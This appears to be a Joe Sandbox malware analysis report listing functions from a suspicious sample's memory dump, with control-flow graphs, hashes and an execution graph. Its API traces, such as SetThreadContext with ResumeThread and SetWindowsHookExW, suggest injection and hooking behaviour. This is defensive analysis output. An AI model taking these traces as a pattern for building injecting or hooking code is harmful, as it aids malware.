                        control_flow_graph 611 10da418-10da41a 612 10da41c 611->612 613 10da41e-10da480 611->613 612->613 615 10da497-10da4df SetThreadContext 613->615 616 10da482-10da494 613->616 618 10da4e8-10da534 615->618 619 10da4e1-10da4e7 615->619 616->615 619->618
                        APIs
                        • SetThreadContext.KERNELBASE(?,?), ref: 010DA4CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: 0a0b16b580496cb1150a97a37ed83f80b883bebcaf32d8f606eccfae81c7926d
                        • Instruction ID: 71316be1e267cc272fcb89d7904a72d2d29396a21020a08c07987804ec19198d
                        • Opcode Fuzzy Hash: 0a0b16b580496cb1150a97a37ed83f80b883bebcaf32d8f606eccfae81c7926d
                        • Instruction Fuzzy Hash: 3B41ABB5D05258DFDF14CFA9D984AEEBBF1BB48314F14802AE415B7240D738AA49CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 624 10da420-10da480 626 10da497-10da4df SetThreadContext 624->626 627 10da482-10da494 624->627 629 10da4e8-10da534 626->629 630 10da4e1-10da4e7 626->630 627->626 630->629
                        APIs
                        • SetThreadContext.KERNELBASE(?,?), ref: 010DA4CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: 45376c98d5ca5d7611a62f67b0238883d97a39ff2aa5eb99c1e7579a5cc8333c
                        • Instruction ID: 22ce14cfc8905fc8dc5b5620843b6293b90988ba12c99fd1948c63b5b51d8dc0
                        • Opcode Fuzzy Hash: 45376c98d5ca5d7611a62f67b0238883d97a39ff2aa5eb99c1e7579a5cc8333c
                        • Instruction Fuzzy Hash: E531BAB4D012589FDB10CFA9D884AEEBBF0BB48314F14802AE415B7240D738A949CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        • Opcode ID: b1330556e9f9136e334add79b05e0aace6cdb9e1df1cd16d236ca6a81f96ce02
                        • Instruction ID: e87844ec72d4a1d8e8d656c4c9fb3e4e2df754e7f21263d116ba97c0ad708cb5
                        • Opcode Fuzzy Hash: b1330556e9f9136e334add79b05e0aace6cdb9e1df1cd16d236ca6a81f96ce02
                        • Instruction Fuzzy Hash: 6631CBB4D052189FDB14CFA9E984AEEFBB5BF49314F10942AE405B7300CB74A946CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 010DA3AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 998398d900673933ceea7f7c897bca5cb4fa0901383ece571372a9f7fd018c35
                        • Instruction ID: 9121d52ba1e738650b0e401b40fdf1a6b5305935b83a9c4427c5825b5349b415
                        • Opcode Fuzzy Hash: 998398d900673933ceea7f7c897bca5cb4fa0901383ece571372a9f7fd018c35
                        • Instruction Fuzzy Hash: ED31EDB4D042089FCB14CFA9D884AAEFBB1AB48314F14802AE915B7310DB34A945CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 010DA3AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 9af70b4c8a79e8a75af9fce481c5c2a4b1335f815904e3cdb14d257996545c70
                        • Instruction ID: 11584e08dbec71b1510c06c2e2b22d0fb9fa810e8e14b1512e2527a3e5a92080
                        • Opcode Fuzzy Hash: 9af70b4c8a79e8a75af9fce481c5c2a4b1335f815904e3cdb14d257996545c70
                        • Instruction Fuzzy Hash: 4331CAB4D042589FCF10CFA9D884AEEFBB5AF48324F14942AE915B7300CB74A945CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 010DF1A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: cac7913f37d754ec48e073c95422f3d401125ab62e8d0d55b4d6416e7ab1ee52
                        • Instruction ID: fafadd1c6f26840bce2c59001fe398c71092ddb5b28d1ea7e106878809fedf8b
                        • Opcode Fuzzy Hash: cac7913f37d754ec48e073c95422f3d401125ab62e8d0d55b4d6416e7ab1ee52
                        • Instruction Fuzzy Hash: 3531CCB8D042099FCB10CFA9D884ADEFBF4EB49324F14906AE915B7300D734A945CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: |@m6
                        • API String ID: 0-1876872587
                        • Opcode ID: ed421ed9ed3e39032bb2d731ebbfcd21e468768eb450134ed95dcf10c5a50bff
                        • Instruction ID: 88052dbfcc01f838d2649604f4b8208eb3223bc50a8f028321c70d164e890e68
                        • Opcode Fuzzy Hash: ed421ed9ed3e39032bb2d731ebbfcd21e468768eb450134ed95dcf10c5a50bff
                        • Instruction Fuzzy Hash: 26A19B70D0421A9FCF00CFA9CA805AEFBF2FF89314F148659C995AB255D7349A41CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: |@m6
                        • API String ID: 0-1876872587
                        • Opcode ID: 58750f8467df2e5070151f632e2d6e13fdc789b092408a3ec226a2426c63dd79
                        • Instruction ID: 3f8aca8c685ccda18b3361af00eb196443c3a628d7cdc10e32c3a22c7f8e81c8
                        • Opcode Fuzzy Hash: 58750f8467df2e5070151f632e2d6e13fdc789b092408a3ec226a2426c63dd79
                        • Instruction Fuzzy Hash: EFA1B071D0421A8FCF00CFA9CA805AEFBF2FF89314F148259C595EB255D7349A01CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: hS
                        • API String ID: 0-4127065202
                        • Opcode ID: cc4b02788ffb84c17e0ac0157e13424a6aadb139aeb6da4781b6985132deff9e
                        • Instruction ID: 11b15d358e8214df26f18e059cd1534d42f853269bd00bb3706441de8febed68
                        • Opcode Fuzzy Hash: cc4b02788ffb84c17e0ac0157e13424a6aadb139aeb6da4781b6985132deff9e
                        • Instruction Fuzzy Hash: 654107B1E0460A9FDB04CFAAC8815AEFBF2BF88300F24C06AD955B7254E7349A41CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID: hS
                        • API String ID: 0-4127065202
                        • Opcode ID: 8c08c6adf0b71cd6889b60e35feac8ca7a92e2b0024a83fc00035f4c5db81565
                        • Instruction ID: ccf193af35bf674953193aef7933d68928bb998e5fdb77fa2f07f4c994d156ac
                        • Opcode Fuzzy Hash: 8c08c6adf0b71cd6889b60e35feac8ca7a92e2b0024a83fc00035f4c5db81565
                        • Instruction Fuzzy Hash: 9E41D6B0E0460A9FDB44CFAAC8815AEFBF2BF88300F24C06AD955B7254D7359A41CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10941a69f8d0c3b334ad12f054484d7b1634d6baab7ccf949a798abd3e3c181a
                        • Instruction ID: 9bb0e06fadefbcfa4c404a0132c208cce12ed50aff377c35d3d81019417369cc
                        • Opcode Fuzzy Hash: 10941a69f8d0c3b334ad12f054484d7b1634d6baab7ccf949a798abd3e3c181a
                        • Instruction Fuzzy Hash: 62817370A082699BCB44DF9AD9C049DFBB3FFC9304B28C659C1599B21AD735E842CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d1a662a18ed64af8c0879b981f929be77aa1dd8866f4e7100e5cae56f240a70
                        • Instruction ID: 6e02a4b1a4cb9e5243bc887d17bb87d904271de571939af4c4deae010b0b2505
                        • Opcode Fuzzy Hash: 6d1a662a18ed64af8c0879b981f929be77aa1dd8866f4e7100e5cae56f240a70
                        • Instruction Fuzzy Hash: A071A670A081699BDB44DFA9D9C049DFFB3BFC9304B28C659C1599B21AD735D842CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf0679bbc78d6ab7afd81a3003c0a4e0f23a1b7f619c1d7f78ca052769ed15ad
                        • Instruction ID: 157476bad0dbc568830f983c778d6d48d5a87d62a4848db923839a0de556fa95
                        • Opcode Fuzzy Hash: cf0679bbc78d6ab7afd81a3003c0a4e0f23a1b7f619c1d7f78ca052769ed15ad
                        • Instruction Fuzzy Hash: 7471F6B4E15219CFCB04CFA9D9904EEFBF2FF88214F28942AE445BB215D7359A41CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bbb395e5ba7425b602428e929d17baf43944ba097736836db234eea96b35cb9
                        • Instruction ID: 0e3b2fbcde13f883db13e77972b3ba00ba8a43defc3a098cfe2d6f4ae26335dc
                        • Opcode Fuzzy Hash: 6bbb395e5ba7425b602428e929d17baf43944ba097736836db234eea96b35cb9
                        • Instruction Fuzzy Hash: E1610674E152198FCB04CFA9C9904EEFBF2FF88210F28D46AE445BB215D3359A01CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4d9781ed8baeb83735e739faee7ead616807f0830b278247c93ba76c71e957f8
                        • Instruction ID: 7137cae55bc30fdd7f93caccc2858423c74b711076e01807a49dcef812439444
                        • Opcode Fuzzy Hash: 4d9781ed8baeb83735e739faee7ead616807f0830b278247c93ba76c71e957f8
                        • Instruction Fuzzy Hash: 136127B0E0420E9FCB04CFA9C9819EEFBB2EF89300F14916AD955A7254D7349682CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8077c1457a85ea36962f60045d4ad189f9aa8c1118d07d596affc758e7ea5309
                        • Instruction ID: 8ef5d53e30b7163e6e3abfda74ea7f9158761c8c3e227ec5f2177b96dab49c40
                        • Opcode Fuzzy Hash: 8077c1457a85ea36962f60045d4ad189f9aa8c1118d07d596affc758e7ea5309
                        • Instruction Fuzzy Hash: 25614AB0E1420E9FCB04CFA9C9819EEFBB2FF88300F14955AD955A7654E7349682CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9affcf65d87bc4d37cae2203860a7a428e367defb5475081ec2500ae3a3c7452
                        • Instruction ID: ea5f22ac4cb99ff93b1754d51fd3f9edb8f889636be999535f1f834478e1056c
                        • Opcode Fuzzy Hash: 9affcf65d87bc4d37cae2203860a7a428e367defb5475081ec2500ae3a3c7452
                        • Instruction Fuzzy Hash: 2B51FDB0D043188FDB24CFA9D884BAEFBF1BF49304F14816AE455AB291DB749885CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 207986a70f91e58ecc9c0458f5b531bdd2dae8005502d5a3a5a58505f02f4409
                        • Instruction ID: 47ba4ad58181161ace7400de32cc35bd088be5f2e949299143d820fb613e70db
                        • Opcode Fuzzy Hash: 207986a70f91e58ecc9c0458f5b531bdd2dae8005502d5a3a5a58505f02f4409
                        • Instruction Fuzzy Hash: CA51FDB0D043288FDB24CFA9D884B9EBBF1BF49304F24816AE555BB290DB749845CF85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a46c1902f1d27ddc4ea148b4cbb0a3d3758b377185873e7c9a5b251e2add5d8
                        • Instruction ID: 68ff3787684426dafe2b29d0ae0d1b525e4408c8e7cb6c9caa176c72327cf5fe
                        • Opcode Fuzzy Hash: 6a46c1902f1d27ddc4ea148b4cbb0a3d3758b377185873e7c9a5b251e2add5d8
                        • Instruction Fuzzy Hash: BD51EFB4D043199FDB24CFA9D884BADBBF1BB49308F14812AE456AB250DB749846CF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90064c6199cd8c949a1b09cdcee4532f68296d374ff8701e6477fcdaa662974d
                        • Instruction ID: ba92bf304a9d9ab453df661f9795ad82d1cdb3c3a7c779af60334cd78bce07b8
                        • Opcode Fuzzy Hash: 90064c6199cd8c949a1b09cdcee4532f68296d374ff8701e6477fcdaa662974d
                        • Instruction Fuzzy Hash: 804117B1E056588BDB59CF6B9D542DEBBF3AFC9300F14C1AAC448AA265EF3149428F41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30576d0f88bd4039c971c908da8d0cb0806cdf8d6874107ff78b78d17473eff0
                        • Instruction ID: 8db67b42c0667d301d8f202a4b7a180c7e1691f44054ba85ecf69e0a614c1333
                        • Opcode Fuzzy Hash: 30576d0f88bd4039c971c908da8d0cb0806cdf8d6874107ff78b78d17473eff0
                        • Instruction Fuzzy Hash: BA41A4B4E0560ADFCB48CFA9C5805EEFBF2FB88310F24C56AC559A7214DB359A41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58a92c241b604aa94278a65ac61907867a64db1d0772f96a8f3d5de02fc660f8
                        • Instruction ID: 7649add5f55fd53e4071df6a9ec94d36ecab4f6762226d77c54d76ef9a475f24
                        • Opcode Fuzzy Hash: 58a92c241b604aa94278a65ac61907867a64db1d0772f96a8f3d5de02fc660f8
                        • Instruction Fuzzy Hash: B84157B5E043188FDB08CFAAE944A9DFBF2EF89314F14C46AD544AB261E7359842CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6b28d89f07cb5c2a750e927efb87cd8128ecb3113272eeeb4c88f7ce7ddd0363
                        • Instruction ID: 42c3c56aec2b47bed95d6218e38576f5bd055fc5afe92e7fa7081ab28950ba62
                        • Opcode Fuzzy Hash: 6b28d89f07cb5c2a750e927efb87cd8128ecb3113272eeeb4c88f7ce7ddd0363
                        • Instruction Fuzzy Hash: DE41D7B4E0560ADFCB44CFA9C5805AEFBF2FF88310F14C16AC559A7254DB359A41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d178cca9f01f750bcf47963b8dd453e318ec662a22e91cf3e340dc9d918692cc
                        • Instruction ID: 4962bf6f67f4c2d4a0ebdbf17dd0ab403729da051959ab2cafa7dd8745834ea2
                        • Opcode Fuzzy Hash: d178cca9f01f750bcf47963b8dd453e318ec662a22e91cf3e340dc9d918692cc
                        • Instruction Fuzzy Hash: ED316A71E056289BDB68CF6BDD446CEFBF7AFC9304F14C1AA950CA6264DB3159818E40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac2370899945bd0e5a5a912991db70583014147cd3ee7a4c6bb3a45fbd28f9e9
                        • Instruction ID: 743eb924593abf4e9fdb4ba57e4e0c47a6fdf07b783e763ab3612b44a1ad7e03
                        • Opcode Fuzzy Hash: ac2370899945bd0e5a5a912991db70583014147cd3ee7a4c6bb3a45fbd28f9e9
                        • Instruction Fuzzy Hash: 4A311374E002189BDB18CFAAE844ADEBBF2FF88310F14C16AD548AB314DB345942CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.276906058.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aed92ca54eec9977dec2e7611a364c1d4eed4bf7abaf5724cb2331ad9d403711
                        • Instruction ID: 656796d473c6fd2645fba0aae64370bdf754ae3838edd220250851500d595f33
                        • Opcode Fuzzy Hash: aed92ca54eec9977dec2e7611a364c1d4eed4bf7abaf5724cb2331ad9d403711
                        • Instruction Fuzzy Hash: 2C31AD71E056588BDB5DCF6B8D442CEFBF3AFC9300F14C1BA944CAA265EB3149428E40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:11%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0.7%
                        Total number of Nodes:414
                        Total number of Limit Nodes:28
                        execution_graph 48187 a80a810 48188 a80a830 48187->48188 48193 a804e60 48188->48193 48190 a80a850 48204 a804eb0 48190->48204 48194 a804e71 48193->48194 48195 a804e94 48193->48195 48194->48190 48195->48194 48197 a804ed0 48195->48197 48198 a804eb0 DuplicateHandle 48195->48198 48199 a804e60 DuplicateHandle 48195->48199 48213 a804f4e 48195->48213 48218 a805166 48195->48218 48196 a80519e 48196->48190 48197->48196 48223 a80a899 48197->48223 48231 a80a998 48197->48231 48198->48197 48199->48197 48205 a804ed0 48204->48205 48207 a804eb0 DuplicateHandle 48204->48207 48208 a804e60 DuplicateHandle 48204->48208 48209 a805166 DuplicateHandle 48204->48209 48210 a804f4e DuplicateHandle 48204->48210 48206 a80519e 48205->48206 48211 a80a998 DuplicateHandle 48205->48211 48212 a80a899 DuplicateHandle 48205->48212 48207->48205 48208->48205 48209->48205 48210->48205 48211->48205 48212->48205 48215 a804f09 48213->48215 48214 a80519e 48214->48197 48215->48214 48216 a80a998 DuplicateHandle 48215->48216 48217 a80a899 DuplicateHandle 48215->48217 48216->48215 48217->48215 48220 a804f09 48218->48220 48219 a80519e 48219->48197 48220->48219 48221 a80a998 DuplicateHandle 48220->48221 48222 a80a899 DuplicateHandle 48220->48222 48221->48220 48222->48220 48224 a80a8b9 48223->48224 48225 a80a8dc 48223->48225 48224->48197 48226 a80a909 48225->48226 48229 a80a998 DuplicateHandle 48225->48229 48230 a80a899 DuplicateHandle 48225->48230 48226->48197 48227 a80aa61 48227->48226 48238 a80ac58 48227->48238 48229->48227 48230->48227 48233 a80a9b4 48231->48233 48232 a80aa7c 48232->48197 48233->48232 48236 a80a998 DuplicateHandle 48233->48236 48237 a80a899 DuplicateHandle 48233->48237 48234 a80aa61 48234->48232 48235 a80ac58 DuplicateHandle 48234->48235 48235->48232 48236->48234 48237->48234 48241 a80ac69 48238->48241 48239 a80ac78 48239->48226 48240 a80ac58 DuplicateHandle 48240->48241 48241->48239 48241->48240 48243 a80dbf8 48241->48243 48247 a80dc13 48241->48247 48242 a80dc6e 48242->48226 48243->48226 48243->48242 48252 a80f976 48243->48252 48245 a80eef6 48249 a80dc31 48247->48249 48248 a80dc6e 48248->48241 48249->48241 48249->48248 48250 a80f976 DuplicateHandle 48249->48250 48251 a80eef6 48250->48251 48253 a80f983 48252->48253 48254 a80f9f5 48253->48254 48257 a80faa0 48253->48257 48260 a80fa90 48253->48260 48254->48245 48258 a80face 48257->48258 48263 a80f4a8 48257->48263 48258->48254 48261 a80f4a8 DuplicateHandle 48260->48261 48262 a80face 48261->48262 48262->48254 48264 a80fb08 DuplicateHandle 48263->48264 48265 a80fb9e 48264->48265 48265->48258 48464 a805860 48465 a80587f 48464->48465 48466 a8058b5 LdrInitializeThunk 48465->48466 48467 a8058d2 48466->48467 48266 ab33490 48267 ab334aa 48266->48267 48269 ab334ee 48267->48269 48270 ab32aa8 48267->48270 48273 ab33680 SetWindowsHookExW 48270->48273 48272 ab3370a 48272->48267 48273->48272 48458 ab314e0 48459 ab314eb 48458->48459 48460 ab314fb 48459->48460 48462 ab31530 OleInitialize 48459->48462 48463 ab31594 48462->48463 48463->48460 48274 6f60850 48275 6f6085d 48274->48275 48279 ab35bf0 48275->48279 48283 ab35c00 48275->48283 48280 ab35c00 48279->48280 48287 ab35354 48280->48287 48284 ab35c0f 48283->48284 48285 ab35354 6 API calls 48284->48285 48286 6f60875 48285->48286 48288 ab3535f 48287->48288 48291 ab353fc 48288->48291 48290 ab35d06 48292 ab35407 48291->48292 48293 ab3640d 48292->48293 48296 ab37b30 48292->48296 48301 ab37b2f 48292->48301 48293->48290 48297 ab37b51 48296->48297 48298 ab37b75 48297->48298 48306 ab37ce0 48297->48306 48310 ab37cdf 48297->48310 48298->48293 48302 ab37b51 48301->48302 48303 ab37b75 48302->48303 48304 ab37ce0 6 API calls 48302->48304 48305 ab37cdf 6 API calls 48302->48305 48303->48293 48304->48303 48305->48303 48307 ab37ced 48306->48307 48308 ab37d26 48307->48308 48314 ab36fb4 48307->48314 48308->48298 48311 ab37ced 48310->48311 48312 ab37d26 48311->48312 48313 ab36fb4 6 API calls 48311->48313 48312->48298 48313->48312 48315 ab36fbf 48314->48315 48316 ab37d98 48315->48316 48318 ab36fe8 48315->48318 48319 ab36ff3 48318->48319 48324 ab36ff8 48319->48324 48321 ab37e07 48328 ab3bfb4 48321->48328 48325 ab37003 48324->48325 48326 ab3813c 48325->48326 48327 ab37b30 6 API calls 48325->48327 48326->48321 48327->48326 48329 ab37e40 48328->48329 48330 ab3bfcd 48328->48330 48329->48316 48337 ab3c1e1 48330->48337 48341 ab3c1f0 48330->48341 48331 ab3c005 48345 a9ed568 48331->48345 48355 a9ed560 48331->48355 48332 ab3c0aa 48338 ab3c1fa 48337->48338 48365 ab3c223 48337->48365 48376 ab3c230 48337->48376 48338->48331 48343 ab3c223 5 API calls 48341->48343 48344 ab3c230 5 API calls 48341->48344 48342 ab3c1fa 48342->48331 48343->48342 48344->48342 48346 a9ed592 48345->48346 48387 a9eda7c 48346->48387 48392 a9eda80 48346->48392 48347 a9ed610 48348 a9ed22c GetModuleHandleW 48347->48348 48350 a9ed639 48347->48350 48349 a9ed663 48348->48349 48351 a9eee8f CreateWindowExW 48349->48351 48352 a9eeec0 CreateWindowExW 48349->48352 48351->48350 48352->48350 48356 a9ed592 48355->48356 48363 a9eda7c 3 API calls 48356->48363 48364 a9eda80 3 API calls 48356->48364 48357 a9ed610 48360 a9ed639 48357->48360 48397 a9ed22c 48357->48397 48363->48357 48364->48357 48366 ab3c243 48365->48366 48370 a9ed22c GetModuleHandleW 48365->48370 48371 a9edbf0 GetModuleHandleW GetModuleHandleW 48365->48371 48372 a9edf00 GetModuleHandleW 48365->48372 48373 a9edbe1 GetModuleHandleW GetModuleHandleW 48365->48373 48367 ab3c25b 48366->48367 48374 ab3c223 GetModuleHandleW GetModuleHandleW GetModuleHandleW GetModuleHandleW LoadLibraryExW 48366->48374 48375 ab3c230 GetModuleHandleW GetModuleHandleW GetModuleHandleW GetModuleHandleW LoadLibraryExW 48366->48375 48367->48338 48368 ab3c253 48368->48367 48369 ab3b478 LoadLibraryExW 48368->48369 48369->48367 48370->48366 48371->48366 48372->48366 48373->48366 48374->48368 48375->48368 48381 a9ed22c GetModuleHandleW 48376->48381 48382 a9edbf0 GetModuleHandleW GetModuleHandleW 48376->48382 48383 a9edf00 